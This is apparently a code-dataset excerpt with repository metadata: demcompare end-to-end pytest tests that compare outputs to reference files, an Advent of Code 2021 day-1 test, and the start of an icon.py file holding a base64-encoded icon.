            "stats/slope/stats_results_coherent-classification.csv",
        ):
            assert_csv_same(stats_file)
@pytest.mark.end2end_tests
def test_demcompare_standard_outputs_with_roi():
    """
    Standard main end2end test with ROI input.
    Test that the outputs given by the Demcompare execution
    of data/standard_roi/input/test_config.json are the same
    as the reference ones in data/standard_roi/ref_output/
    """
    # Get "standard_roi" test root data directory absolute path
    test_data_path = demcompare_test_data_path("standard_roi")
    # Load "standard_roi" demcompare config from input/test_config.json
    test_cfg = read_config_file(os.path.join(test_data_path, "input/test_config.json"))
    # Get "standard_roi" demcompare reference output path
    test_ref_output_path = os.path.join(test_data_path, "ref_output")

    # Create temporary directory for test output
    with TemporaryDirectory(dir=temporary_dir()) as tmp_dir:
        # Helpers factored out of the original copy-pasted blocks; each
        # one compares a single produced artifact against its reference.

        def assert_cfg_allclose(ref_cfg, out_cfg, *keys):
            # Assert one nested numeric entry of both configs is close.
            ref_val, out_val = ref_cfg, out_cfg
            for key in keys:
                ref_val = ref_val[key]
                out_val = out_val[key]
            np.testing.assert_allclose(ref_val, out_val, atol=TEST_TOL)

        def assert_csv_same(rel_path):
            # Assert an output CSV equals the reference one.
            ref_csv = read_csv_file(os.path.join(test_ref_output_path, rel_path))
            out_csv = read_csv_file(os.path.join(tmp_dir, rel_path))
            np.testing.assert_allclose(ref_csv, out_csv, atol=TEST_TOL)

        # Modify test's output dir in configuration to tmp test dir,
        # save the new configuration inside the tmp dir and run demcompare
        test_cfg["outputDir"] = tmp_dir
        tmp_cfg_file = os.path.join(tmp_dir, "test_config.json")
        save_config_file(tmp_cfg_file, test_cfg)
        demcompare.run(tmp_cfg_file)

        # TEST JSON CONFIGURATION
        # Check initial config "test_config.json"
        cfg_file = "test_config.json"
        ref_output_cfg = read_config_file(os.path.join(test_ref_output_path, cfg_file))
        output_cfg = read_config_file(os.path.join(tmp_dir, cfg_file))
        np.testing.assert_equal(ref_output_cfg["stats_opts"], output_cfg["stats_opts"])
        np.testing.assert_equal(ref_output_cfg["plani_opts"], output_cfg["plani_opts"])

        # Test final_config.json numeric results
        cfg_file = get_out_file_path("final_config.json")
        ref_output_cfg = read_config_file(os.path.join(test_ref_output_path, cfg_file))
        output_cfg = read_config_file(os.path.join(tmp_dir, cfg_file))
        assert_cfg_allclose(ref_output_cfg, output_cfg, "plani_results", "dx", "bias_value")
        assert_cfg_allclose(ref_output_cfg, output_cfg, "plani_results", "dy", "bias_value")
        assert_cfg_allclose(ref_output_cfg, output_cfg, "alti_results", "dz", "bias_value")

        # TEST DIFF TIF
        for img in ("initial_dh.tif", "final_dh.tif"):
            rel_img = get_out_file_path(img)
            assert_same_images(
                os.path.join(test_ref_output_path, rel_img),
                os.path.join(tmp_dir, rel_img),
                atol=TEST_TOL,
            )

        # TESTS CSV SNAPSHOTS
        for csv_name in (
            "initial_dem_diff_pdf.csv",
            "final_dem_diff_pdf.csv",
            "initial_dem_diff_cdf.csv",
            "final_dem_diff_cdf.csv",
        ):
            assert_csv_same(get_out_file_path(csv_name))

        # TEST CSV STATS (paths are relative to the output dir directly)
        for stats_file in (
            "stats/slope/stats_results_standard.csv",
            "stats/slope/stats_results_coherent-classification.csv",
        ):
            assert_csv_same(stats_file)
@pytest.mark.end2end_tests
def test_demcompare_with_classification_layer():
    """
    Demcompare with classification layer main end2end test.
    Test that the outputs given by the Demcompare execution
    of data/classification_layer/input/test_config.json are
    the same as the reference ones
    in data/classification_layer/ref_output/
    """
    # Get "classification_layer" test root data directory absolute path
    test_data_path = demcompare_test_data_path("classification_layer")
    # Load "classification_layer" demcompare config from input/test_config.json
    test_cfg_path = os.path.join(test_data_path, "input/test_config.json")
    test_cfg = read_config_file(test_cfg_path)
    # Modify test's classification layer path to its complete path
    classif_layer_path = os.path.join(
        "input",
        test_cfg["stats_opts"]["classification_layers"]["Status"]["dsm"],
    )
    test_cfg["stats_opts"]["classification_layers"]["Status"][
        "dsm"
    ] = os.path.join(test_data_path, classif_layer_path)
    # Get "classification_layer" demcompare reference output path for
    test_ref_output_path = os.path.join(test_data_path, "ref_output")
    # Create temporary directory for test output
    with TemporaryDirectory(dir=temporary_dir()) as tmp_dir:

        def check_csv(rel_file):
            """Assert that the output CSV matches the reference CSV."""
            ref_output_csv = read_csv_file(
                os.path.join(test_ref_output_path, rel_file)
            )
            output_csv = read_csv_file(os.path.join(tmp_dir, rel_file))
            np.testing.assert_allclose(
                ref_output_csv, output_csv, atol=TEST_TOL
            )

        def check_image(rel_img):
            """Assert that the output image matches the reference image."""
            ref_output_data = os.path.join(test_ref_output_path, rel_img)
            output_data = os.path.join(tmp_dir, rel_img)
            assert_same_images(ref_output_data, output_data, atol=TEST_TOL)

        # Modify test's output dir in configuration to tmp test dir
        test_cfg["outputDir"] = tmp_dir
        # Set a new test_config tmp file path
        tmp_cfg_file = os.path.join(tmp_dir, "test_config.json")
        # Save the new configuration inside the tmp dir
        save_config_file(tmp_cfg_file, test_cfg)
        # Run demcompare with "standard" configuration (and replace conf file)
        demcompare.run(tmp_cfg_file)
        # Now test demcompare output with test ref_output:
        # TEST JSON CONFIGURATION
        # Check initial config "test_config.json": the classification layer
        # classes and the planimetry options must be copied through unchanged
        cfg_file = "test_config.json"
        ref_output_cfg = read_config_file(
            os.path.join(test_ref_output_path, cfg_file)
        )
        output_cfg = read_config_file(os.path.join(tmp_dir, cfg_file))
        np.testing.assert_equal(
            ref_output_cfg["stats_opts"]["classification_layers"]["Status"][
                "classes"
            ],
            output_cfg["stats_opts"]["classification_layers"]["Status"][
                "classes"
            ],
        )
        np.testing.assert_equal(
            ref_output_cfg["plani_opts"], output_cfg["plani_opts"]
        )
        # Test final_config.json: compare the computed coregistration bias
        # values (dx, dy planimetric and dz altimetric) within tolerance
        cfg_file = get_out_file_path("final_config.json")
        ref_output_cfg = read_config_file(
            os.path.join(test_ref_output_path, cfg_file)
        )
        output_cfg = read_config_file(os.path.join(tmp_dir, cfg_file))
        for results_key, axis_key in (
            ("plani_results", "dx"),
            ("plani_results", "dy"),
            ("alti_results", "dz"),
        ):
            np.testing.assert_allclose(
                ref_output_cfg[results_key][axis_key]["bias_value"],
                output_cfg[results_key][axis_key]["bias_value"],
                atol=TEST_TOL,
            )
        # TEST DIFF TIF
        # Test initial_dh.tif and final_dh.tif
        check_image(get_out_file_path("initial_dh.tif"))
        check_image(get_out_file_path("final_dh.tif"))
        # TEST SLOPE STATS
        check_csv("stats/slope/stats_results_standard.csv")
        check_csv("stats/slope/stats_results_coherent-classification.csv")
        check_image("stats/slope/dsm_support_map_rectif.tif")
        check_image("stats/slope/ref_support_map_rectif.tif")
        # TEST STATUS CLASSIFICATION LAYER STATS
        check_csv("stats/Status/stats_results_standard.csv")
        check_image("stats/Status/dsm_support_map_rectif.tif")
        # TEST FUSION_LAYER STATS
        check_csv("stats/fusion_layer/stats_results_standard.csv")
        check_image("stats/fusion_layer/dsm_fusion_layer.tif")
| 40.45
| 80
| 0.689408
| 2,993
| 21,034
| 4.476779
| 0.066154
| 0.09135
| 0.063438
| 0.051198
| 0.889171
| 0.888723
| 0.881633
| 0.870065
| 0.843347
| 0.831928
| 0
| 0.000909
| 0.215175
| 21,034
| 519
| 81
| 40.527938
| 0.810758
| 0.217267
| 0
| 0.753378
| 0
| 0
| 0.137903
| 0.071319
| 0
| 0
| 0
| 0
| 0.172297
| 1
| 0.010135
| false
| 0
| 0.027027
| 0
| 0.037162
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
298fa938d8cdc21a1843fab0e44b9f404f660e1e
| 212
|
py
|
Python
|
aoc_2021/test/day1_test.py
|
akohen/AdventOfCode
|
ac4194670d8a2af5357cb1f2e1d3f37df1f0a13e
|
[
"MIT"
] | null | null | null |
aoc_2021/test/day1_test.py
|
akohen/AdventOfCode
|
ac4194670d8a2af5357cb1f2e1d3f37df1f0a13e
|
[
"MIT"
] | null | null | null |
aoc_2021/test/day1_test.py
|
akohen/AdventOfCode
|
ac4194670d8a2af5357cb1f2e1d3f37df1f0a13e
|
[
"MIT"
] | null | null | null |
from aoc_2021.src import day1
def test_phase1():
    # Sample sonar depths from the AoC 2021 day 1 puzzle statement
    depths = [199, 200, 208, 210, 200, 207, 240, 269, 260, 263]
    assert day1.phase1(depths) == 7
def test_phase2():
    # Same sample input; part 2 counts increases of the 3-measurement sums
    depths = [199, 200, 208, 210, 200, 207, 240, 269, 260, 263]
    assert day1.phase2(depths) == 5
| 26.5
| 70
| 0.693396
| 40
| 212
| 3.6
| 0.55
| 0.097222
| 0.125
| 0.166667
| 0.416667
| 0.416667
| 0.416667
| 0.416667
| 0.416667
| 0.416667
| 0
| 0.392473
| 0.122642
| 212
| 7
| 71
| 30.285714
| 0.38172
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.4
| true
| 0
| 0.2
| 0
| 0.6
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
4b0e6a466e3c1b3b54872708ef96efe0e8a457fb
| 96,033
|
py
|
Python
|
icon.py
|
huahuab/QQ_History_Backup
|
d12c22cdbb77cf6ab5355827f8fbe06668ec600b
|
[
"MIT"
] | 139
|
2021-07-10T12:49:17.000Z
|
2022-03-31T09:28:58.000Z
|
icon.py
|
huahuab/QQ_History_Backup
|
d12c22cdbb77cf6ab5355827f8fbe06668ec600b
|
[
"MIT"
] | 15
|
2020-05-22T11:53:04.000Z
|
2021-06-21T18:18:38.000Z
|
icon.py
|
huahuab/QQ_History_Backup
|
d12c22cdbb77cf6ab5355827f8fbe06668ec600b
|
[
"MIT"
] | 21
|
2021-07-24T13:02:44.000Z
|
2022-03-17T07:04:53.000Z
|
ico = '''AAABAAEAgIAAAAEAIAAoCAEAFgAAACgAAACAAAAAAAEAAAEAIAAAAAAAAAABABMLAAATCwAAAAAAAAAAAAD///8A////AP///wD///8A////AP///wD///8A////AP///wDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dANzc3ADY2NgA1NTUANTU1ADV1dUA1tbWANbW1gDU1NQA1tbWANTU1AvV1dUn1dXVVtjY2JDPz8+Azs7OptDQ0OPLy8vwxcXF7cPDw+3Dw8Ptw8PD7cXFxe3JycnyzMzM0MzMzJLQ0NCF2NjYjM/PzzrR0dEi29vbJdPT0wDZ2dkAzc3NANLS0gDU1NQAzc3NANjY2ADS0tIAzs7OANjY2ADOzs4AzMzMAM/PzwDQ0NAA0NDQANDQ0ADQ0NAAzs7OAM3NzQDT09MA2dnZAM3NzQDQ0NAA2NjYANDQ0ADW1tYA09PTANXV1QDW1tYA19fXCtnZ2STU1NQ32dnZc9TU1IrOzs6C0NDQws7OzvLHx8fuxcXF7cPDw+3ExMTtxMTE7cfHx+3MzMz1zMzMqs7OzobT09OG2trajtPT0zrb29sm2NjYANfX1wDV1dUA1tbWANLS0gDW1tYA1tbWANra2gDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3NzcANjY2ADU1NQA1NTUANXV1QDX19cA2NjYH9XV1UXU1NRrz8/Pk8zMzMHGxsblwMDA/7q6uv+2trb/sLCw/6urrP+np6j/paWm/6Wlpf+lpab/p6en/6qqqv+vr7D/tbW2/7q6uv+/wMD/w8PDz8fHx7rQ0NC+z9DQetbW1mjPz88x1NTUJdbW1hLOzs4A2dnZANLS0gDOzs4A2NjYAM7OzgDMzMwAz8/PANDQ0ADQ0NAA0NDQANDQ0ADOzs4Azc3NANPT0wDZ2dkAzc3NANDQ0ADZ2dkA0dHRANjY2BjV1dUx1tbWVtTU1GbR0dGQz8/PvcjIyMzExMT5vb2+/7m5uf+zs7T/rq6u/6qrq/+np6f/paWl/6Wlpf+lpaX/p6io/6ysrf+ysrP/uLi4/729vf/CwsL/x8fH0tHR0cDU1NR/1tbWUtfX1yjX19cA0tLSANbW1gDW1tYA2traAN/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDc3NwA2NjYANTU1ADU1NQA1tbWK9XV1XLPz8+2xsbG5r6+vv+0tLT/q6ur/6OjpP+bnJv/mJiX/5aWk/+TkY7/kY+K/5COiP+OjIb/jYuF/42Lh/+PjYj/kY+K/5STjv+ZmJP/np2X/6Gfm/+lpaL/qamn/62trf+3trf/vr6//8PDw8zJycm9zc3Npc3NzWrX19do1dXVTdDQ0CTa2toiz8/PAM3NzQDQ0NAA0dHRANHR0QDR0dEA0dHRAM/PzwDOzs4A1NTUBNvb2yjQ0NAk0dHRQNbW1mrOzs55z8/PrcnJyc/Dw8P9vLy9/7W1tf+vrq7/qqqn/6WkoP+hoJr/nZyX/5iXkv+Uk43/kpCL/4+NiP+Ni4b/jYuG/46Lhv+PjYf/kY+L/5OSkP+WlpX/mZmZ/56env+np6f/sLCw/7u7u//ExMT
4zs7OwtTU1IHU1NQ119fXANbW1gDa2toA39/fAN/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A39/fAP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dANzc3ADY2NgA1dXVEdXV1XPNzc3EwMDA/7Kysv+lpab/nJyd/5WVlf+RkIz/joyG/4qHgP+Fgnz/fn16/3Z3ef9xcnb/a2x0/2Roc/9gY3D/XGBx/1tfcf9cX3H/Y2Ry/2lqdP9ycnr/eXl+/4GBg/+LjIj/lJSO/5yalf+gn5r/pKOi/6enp/+urq//uLi4/7+/v//FxcXvxsbGvM/Pz7jMzMx4y8vLaM7OzmjQ0NBoz8/PaM/Pz2jQ0NBozs7OaM3NzWrOzs6Lz8/PwcbGxrzCwsLdvr6+/7e3t/+urq//p6em/6Khnv+fn5n/m5qU/5STj/+JiYj/f3+C/3d3ff9ubnf/aGlz/2Fjcv9dX3H/W19x/15hcP9iZXL/Zmpz/2xudf9yc3f/eHl5/4KAe/+IhH7/jIqD/5COif+Uk5H/mpqa/6Skpf+xsbH/vr6+/8rKytDU1NSA19fXJdra2gDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3NzcANjY2BHS0tKex8fH/7Ozs/+ioqP/lpaW/4+Oiv+MiYL/hIF7/3d3eP9ma3X/V15z/0dScf86SHL/L0Bz/yY5c/8fNHT/GjJ1/xkvd/8VLHb/Eylz/xMocP8YKm7/Gyhp/yApZP8nLGD/Mzdi/0FEZv9SU2v/Zmd0/3h5fv+JiIT/kI+J/5KRjv+VlJT/mZmZ/5+fn/+lpaX/q6ur/7Kysv+1tbX/ubm5/7m5uf+6urr/urq6/7m5uf+5ubn/tra2/7Kysv+srKz/pqam/56en/+YmJj/lpWT/5STjf+Pj4j/g4OD/3Jzev9eXnH/S01q/zs+Zf8tMmH/Iytj/x4oZv8aKWv/FSdv/xMncf8TKXT/Fy12/xkwdv8cM3T/IDVy/yg7cv8zRXL/QE5y/01Ycv9dZXT/bXB3/359ev+LiIH/kY+K/5aVlP+goKH/r6+v/8LCwv/R0dG+29vbVd/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wDf398A39/fAN/f3wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDc3Nwc1dXVn8LCwv+tra3/m5uc/5ORjf+LiH//enl4/2Fmdf9FU3P/LkR2/x05ff8RN4j/CTWS/wY3nf8FPKn/A0Cx/wJEt/8ESLz/BUvC/wZMwv8GTMH/Bku//wRIvf8CQbT/ADmo/wAyn/8CLZP/BCWD/wohc/8XJGf/KSxg/0JDZf9aXm//c3V4/4KCfP+FhH//g4OC/4aGh/+Li4v/j4+P/5OTk/+VlZX/lpaW/5aWlv+Wlpb/lpaW/5WVlf+Tk5P/kJCQ/4yMjP+Hh4j/hoWD/4eFf/9/f3v/amt0/09Qav81N2H/IClk/xEjbv8HInr/AymK/wAxmf8ANaX/ADyt/wBBt/8DRbv/BUq+/wdLwf8GTMT/BUm//wRFuf8CQrT
/Az6s/wU6of8GNZj/DDSN/xY4gv8jPHn/OUp1/1Nedv9vcnr/hoR//5ORi/+ampn/qamp/729vf/U1NTu3d3dNt7e3gDe3t4A3t7eAN7e3gDe3t4A3t7eAN7e3gDe3t4A3t7eAN7e3gDe3t4A3t7eAP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA29vbANvb2wDb29sA3NzcAtra2l3Jycn/r6+w/56enP+Vkov/f39+/1dgdv8xRXf/FzeC/wk4lf8DQKz/A03B/wZa0v8JZd//C2zn/wxz7/8Mefb/DX35/w1++v8Nfvz/DH/8/wx//f8Mfv3/DH38/wp8+v8IdfX/Bm7y/wVn6f8FX97/BFXQ/wJDuP8CMZv/BiN7/xMgZf8qLl7/SU1o/2Zobv94d3D/d3dz/3V1dv94eHj/enp6/3t7e/99fX3/fX19/319ff99fX3/fX19/3t7e/95eXn/eHd3/3t6dP91dXL/W15s/zk8Yf8eJF//Cx9w/wIpjf8AO6z/A0zF/wRa1v8FY+L/BWrt/wVs8v8GcPP/CHb4/wp6+v8LfPz/DX38/w19/f8Nffv/DXv5/wx6+f8MdfP/C27q/wto4/8JX9j/BVPI/wNGt/8FOqH/DjaL/yM+fP9CUnj/bnJ+/5KPif+gnpn/q6us/8LCwv/X19et3d3dBd3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A3d3dAN3d3QDd3d0A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////ANjY2ADY2NgA2NjYANjY2ADY2NgA2NjYANjY2ADY2NgA2NjYANjY2ADZ2dkX1dXVr729vf+qqab/m5mS/2pxgP8wRXn/DzaI/wQ/qv8EU8r/CWfg/wt28f8Mgfn/DIj9/wuM//8Kjv7/Co/8/wqR+/8Kkfr/CpH6/wqR+v8KkPr/Co/5/wqO+f8KjPn/C4z6/wqI+f8Ge/T/BXf0/wV39/8Fd/r/BnP3/wZs7/8GXdn/BEW4/wQsjf8NHGf/Iidd/0dMZv9nZ2n/cG9o/2trav9ra2v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/AYX//wKA//8FdvX/CHDt/wxi1P8SOIj/EBZP/xsgTf9BPkb/SURE/0VAQv9FQEL/RUBC/0VBQv9JRUf/LjBN/wwVUv8NKXb/DFrM/wZy9v8Ddv7/AXv//wF9//8Cfv//A3v3/wR68P8Ee+//A37x/wN+8f8Ef/H/BZL4/wio//8Iq///CKj//win//8Iqf//B6z//wev//8Hsv//BrT//wa1//8Gt///Brj//wa3//8Gt///Brf//waz/v8Hr/7/CKb7/wia+f8JkPr/C4T8/wtt6f8APKb/NVGR/tDQ0MXh4N0N4eDcAOHg3ADh4NwA4eDcAOHg3ADh4NwA4eDcAOHg3ADh4NwA4eDcAOHg3AD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A6ObhAOjm4QDo5uEA6ObhAOjm4QDo5uEA6ObhAOjm4QDo5uEA6ObhAO3q4wDOz9RQOFea/QBCuP8NhP7/CJH7/wed+f8GrP3/Bbj+/wW+//8FwP//BcH//wXB//8Fwf//BcH//wXA//8Fv///Bb///wa9//8Gu///Brn//wa3//8HtP//B7T//wey//8Hpfz/BJL1/wOL8f8CjPT/AZL//wCX//8AlP//BIfy/wp00v8RXqr/FkyJ/xs8aP8aKkv/Fx84/xQVKP8TCRL/DQQO/w0CCP8QBQn/FgwQ/xYMEP8WDBD/FQoQ/w8FDP8IAAv/DAQR/w8QIf8OHjz/DiZN/xI4a/8STJH
/Dl+3/wlx3P8Dgfj/AIr//wCK//8Chfr/A4Hx/wN+8P8DgvL/BZT3/wik/f8Iqv//CKv//wes//8Hr///BrL//wa1//8Gt///Brj//wa7//8Fu///Bbz//wW8//8FvP//Bbr//wS5//8EtP//BK39/wag+v8Hkvj/C4b9/wxp5P8FM5H+e4yzr8vR3gDJz90Ayc/dAMnP3QDJz90Ayc/dAMnP3QDJz90Ayc/dAMnP3QDJz90Ayc/dAP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wCfrMkAn6zJAJ+syQCfrMkAn6zJAJ+syQCfrMkAn6zJAJ+syQCfrMkAo6/KBYeWu2kUQ53+A2jl/wuP//8In/j/CbL8/we9//8Fwf//BMH//wPC//8ExP//BMb//wTG//8Fxv//BcX//wXD//8Fwv//BcD//wW+//8GvP//Brv//wa7//8Gs/7/BZ/5/wSP8/8Cj/r/AJb//wCV//8Ehuv/DWy4/xZTiP8ePFz/ISk6/xwVHf8WCAr/EwIB/x4KCP8vHBb/QTIu/1lMSP9sX1n/em5o/4J2cf+Pgnz/j4J9/4+Cff+Ognz/gnZy/3ptaP9sX1n/WEtD/0EwJ/8sHBX/Gg0K/w0DCP8ODRr/EyA4/xU5Y/8RVZf/CW7L/wOD9v8Ai///AIj//wOA9P8Df/D/BIr0/wab+v8IrP//B7T//wa2//8Gtv//Brj//wW6//8FvP//Bb///wXA//8Fwf//BMD//wK///8Fv///Cr///xC///8Vvf//Frf+/xGm+/8Kkfj/DH76/wNDrP8+XJ3Xx8/jHcPM4QDDzOEAw8zhAMPM4QDDzOEAw8zhAMPM4QDDzOEAw8zhAMPM4QDDzOEA////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////ADBTmgAwU5oAMFOaADBTmgAwU5oAMFOaADBTmgAwU5oAMFOaADBTmgAxU5oIKU2Weg1Jq/8Ke/X/E5n8/yC0+/8kyP7/Isz//x3K//8Vyf//DMn//wbJ//8Cyv//Asv//wTL//8Eyf//BMj//wXG//8Fw///BcD//wXA//8GwP//BrL7/wSe9/8Bk/3/AJb//wKP+v8LcsT/FlKG/yA1UP8mIi7/IRIV/xcEA/8YBAL/LRoZ/1BAPv96a2f/mY2H/7itpP/MwLX/1cq+/9/Sxf/n2s3/6t7R/+3f0f/s39L/7N/S/+vf0v/q3dH/59rN/97Rxv/Wyr7/y8C0/7mtof+bjYT/empj/1A/Ov8nFhP/EQIC/w0GCv8XHCv/GDhc/xFWmf8HdNj/AYf//wCG//8DgPb/BIPw/wWS9f8Gpvr/Brb+/wa+//8Fv///Bb///wXC//8Exf//BMb//wLH//8Fx///Dcj//xvL//8qzf//N87//z7O//87zP//Lbz+/xKe+f8Kg/n/B1PD/yxPl/WSpcs+kKLJAJCiyQCQoskAkKLJAJCiyQCQoskAkKLJAJCiyQCQoskAkKLJAJCiyQD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8AAS6GAAEuhgABLoYAAS6GAAEuhgABLoYAAS6GAAEuhgABLoYAAS6GAAAuhQgCL4d3Ckqx/wyA+P8lpfv/Rcb9/0zW//9L1v//Q9b//zjW//8q1P//HdH//xDQ//8Gzv//As7//wPN//8EzP//BMr//wTJ//8Fyf//BcH+/wSt+f8Bnv//AJv//wOL8P8PZKz/HT5h/yUmMv8pGhz/HgoK/xQCAv8lFhX/U0VF/4t/ev+3q6P/1ci9/+XYy//s4NL/8OTV//Hk1//v49b/7uLV/+7h1f/s4NT/7eDU/+zg1P/s4dX
/7eLW/+7j1//v5dj/8OXZ//Lm2f/z59r/8ebY/+3h1P/m2cz/1ci8/7irov+OgHn/U0VB/yAQDf8NAAD/FAwQ/x0nOf8WRHb/CmjB/wKF+/8Ai///AoX1/wSJ7/8EmPT/Ba/7/wXB//8Eyf//Bcn//wPK//8Cy///Cc3//xrQ//8u1P//RNj//1ba//9f2///Ytn//1/Y//89yf7/D6H6/wmF+f8JWcf/HUOR90lqqj9IaakASGmpAEhpqQBIaakASGmpAEhpqQBIaakASGmpAEhpqQBIaakASGmpAP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wAUQJIAFECSABRAkgAUQJIAFECSABRAkgAUQJIAFECSABRAkgAUQJIAFECRCRI+kHoLSq7/CX74/yij+/9m0P3/duH//3Pg//9q4P//Xd///03d//882///LNn//xnW//8M1P//A9H//wPP//8E0P//BM///wW++v8Dq/7/AKL//wOO8v8RYZ//HzdS/yceJ/8rGBb/HwwM/xIDB/8wJCb/cWVi/6+jm//Wyb7/6dzP/+/h1P/v4tT/7N/R/+ncz//m2cz/5tnM/+bazf/m2s//59zP/+jcz//o3ND/6NzQ/+jd0f/p3tL/6d7T/+nf1f/q4NX/6+HX/+vh1//r4tj/7uTZ//Dl2v/y5tr/8eTX/+rd0P/ZzMD/s6ee/3RpZP8uIiD/DAAA/xQHCP8eHyr/Fj1l/wlpvf8Aiv3/AI3//wKG8P8Dj+//BKT1/wO8/P8Dz///A9P//w7S//8i1///Odv//1Hg//9i4P//Z+D//